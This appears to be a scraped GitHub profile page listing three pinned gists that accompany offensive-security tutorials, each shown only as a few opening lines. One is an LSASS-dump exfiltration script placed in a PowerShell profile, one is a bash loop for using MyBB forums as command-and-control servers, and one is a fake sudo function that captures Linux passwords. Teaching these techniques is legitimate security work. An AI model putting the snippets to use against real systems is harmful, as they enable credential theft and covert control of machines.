💻
tokyoneon@kali ~#
Pinned Loading
-
exfil LSASS dump via Microsoft.Power...
exfil LSASS dump via Microsoft.PowerShell_profile.ps1 1# write-up: https://www.varonis.com/blog/author/tokyoneon/
23# an if statement to prevent the attack from executing without administrator privileges
4if (whoami /groups | findstr /i "S-1-16-12288")
5{
-
MyCC - turn MyBB forums into C&C ser...
MyCC - turn MyBB forums into C&C servers 1#!/bin/bash
23# https://null-byte.com/turn-forums-into-c-c-servers-0196708/
45while true; do
-
Sudo function for stealing Linux pas...
Sudo function for stealing Linux passwords 1function sudo ()
2{
3# https://null-byte.com/privesc-0194190/
4realsudo="$(which sudo)";
5read -s -p "[sudo] password for $USER: " inputPasswd;
Something went wrong, please refresh the page to try again.
If the problem persists, check the GitHub status page or contact support.
If the problem persists, check the GitHub status page or contact support.